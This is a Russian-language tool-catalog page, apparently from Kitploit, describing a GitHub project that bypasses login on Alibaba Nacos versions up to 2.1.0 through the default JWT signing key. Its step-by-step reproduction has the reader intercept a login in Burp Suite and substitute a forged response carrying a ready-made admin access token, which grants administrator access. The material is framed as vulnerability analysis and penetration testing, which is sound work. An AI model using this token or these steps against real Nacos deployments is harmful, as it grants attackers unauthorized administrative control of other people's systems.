Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/al1ex/alibab-nacos-unauthorized-login
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubal1ex/alibab-nacos-unauthorized-login

Alibab-Nacos-Unauthorized-Login

Alibab Nacos Unauthorized Login

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
1423 лет назадЕщё не проверено

Воздействие уязвимости

Обнаружена проблема в Nacos, затрагивающая Nacos <= 2.1.0. Пользователи Nacos используют ключ JWT по умолчанию, что приводит к уязвимости несанкционированного доступа. Через эту уязвимость злоумышленники могут обойти аутентификацию по имени пользователя и паролю и напрямую войти в систему Nacos

Уязвимый продукт

Версия Nacos <= 2.1.0

Воспроизведение уязвимости

Шаг 1: Перейдите на сайт Nacos, введите любые имя пользователя и пароль и перехватите запрос с помощью Burpsuite.

login

Шаг 2: Перехватите ответный пакет.

response

Шаг 3: Измените пакет данных следующим образом

root@kitploit:~
HTTP/1.1 200
Date: Thu, 10 Nov 2022 01:27:16 GMT
Content-Type: application/json
Content-Length: 13
Connection: close
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Content-Security-Policy: script-src 'self'
Server: elb

{"accessToken":"eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA","tokenTtl":18000,"globalAdmin":true}

new

Шаг 4: После отправки пакета данных вы успешно войдете в систему.

success

Скачать инструмент